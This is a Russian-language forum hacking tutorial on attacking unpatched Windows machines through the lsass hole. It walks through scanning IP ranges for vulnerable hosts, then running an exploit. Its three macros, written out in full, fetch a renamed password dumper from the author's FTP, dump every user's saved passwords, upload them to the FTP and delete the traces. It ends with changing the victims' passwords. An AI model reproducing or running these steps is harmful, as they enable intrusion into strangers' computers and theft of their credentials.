Многие тут говорят про кахт... О кахт-кахт... Да... как же он мне помогал... Но щас куча компов уже пропатчена на него, другое дело апрельская дыра в lsass. Ещё куча компов не залатали дыры от неё.
Итак, начинаем!
Что нам понадобиться?
1. Ну для начала lsass exploit... Вот недавно вышла новая версия, которая всё
значительно упрощает =) Качаем эксплоит Здесь
2. Собственно сканер дыры. Ибо в эксплоите он жутко ацтойный. Имхо лучшый -
DSScan. Забираем отсюда
3. То, чем мы будем забирать пароли. Можем и трояном, но с ним будете сами геморроится.
Я расскажу как иметь dialuppass`ом. Забираем здесь
4. По идее тут должен быть сервер... Но я его так нормально и не настроил =)
Так что идите на суперсервак http://www.newmail.ru/ и регайте себе там мыло-ftp!
Теперь смотрим что имеем:
1. lsa.exe
2. DSScan.exe
3. dialupass.exe - переименовываем в z.exe
4. сайт ya-supermegahacker.nm.ru и пароль ya_ne_lamo
5. заливаем z.exe на ftp newmail`а.
Запускаем DSScan и видим вот это:
color:#707070'>
Hostname/IP - ваш текущий айпишник
Start IP - начало диапазона для скана
End IP - соответственно конец
Указываем диапазоны и жмём на -> рядом с указанными диапазонами. При необходимости
указываем ещё диапазоны и добавляем так же.
Если у вас есть уже записанные диапазоны в формате xxx.xxx.xxx.xxx-xxx.xxx.xxx.yyy,
сохранённые в тхт, то жмите Browse и указывайте из какого файла забирать.
Справа должны быть указаны диапазоны. Нажимаем кнопку плей (как на магнитофонах...
в виде знака >)
Если всё, ок должно быть так как здесь:
Если все Not vulnerable , то система пропатчена и неуязвима, а вот если
vulnerable, то всё зашибись!
Жмём на это вулнерейбл правую кнопку мышки и выбираем Copy IP to clipboard.
На этом DSScan пока можно отложить.
Запускаем lsa.exe! Он значит-с вот такой:
Прежде чем что-либо делать зададим макросы, для упрощения работы:
Заполняем поля вот как здесь:
Короче должно быть 3 макроса. 1,2 и 3 соответственно.
Задержка везде - 100 мс.
Тексты макросов:
echo open ftp.newmail.ru 21>mpg
echo ya-supermegahacker.nm.ru>>mpg
echo ya_ne_lamo>>mpg
echo bin>>mpg
echo get z.exe>>mpg
echo bye>>mpg
ftp -s:mpg
Это мы скачиваем файл
del mpg
z.exe /allusers /stext %COMPUTERNAME%.txt
echo open ftp.newmail.ru 21>mpg
echo ya-supermegahacker.nm.ru>>mpg
echo ya_ne_lamo>>mpg
echo bin>>mpg
echo send %COMPUTERNAME%.txt>>mpg
echo bye>>mpg
ftp -s:mpg
Это мы создаём и отправляем пароли.
del mpg
del z.exe
del %COMPUTERNAME%.txt
а это мы убираемся за собой.
После ввода каждого не забываем нажимать кнопку Сохранить!
Терь закрываем редактор макросов. У вас в буфере должен быть IP (вы не забыли?).
Жмём Вставить IP-адрес
Остальные настройки НЕ меняем. Терь 2 варианта событий.
1. Соединение с xxx.xxx.xxx.xxx ...
Невозможно соединиться с xxx.xxx.xxx.xxx :445...
//ye тут всё понятно
2. Соединение с xxx.xxx.xxx.xxx...
Определение операционной системы...
Атака... Готово!
Здесь появляется окошко:
Если оно тут же исчезло, то соединение таки заблокировали, пробуйте другой IP.
Тут вводим 1 и жмём Enter. Дожидаемся слов
bin
get z.exe
bye
X:XXXXXsystem32>
Жмём 2 и ждём слов:
bin
send IMYA_KOMPA.txt
bye
X:XXXXXsystem32>
Жмём 3 ждём слов:
X:XXXXXsystem32>del z.exe
X:XXXXXsystem32>del %COMPUTERNAME%.txt
Закрываем окно.
Всё! пассы на нашем FTP
СКАЧАТЬ ВИДЕО
Сливаем файло к себе на комп, при возможности меняем пассы и идём бухать с
радости.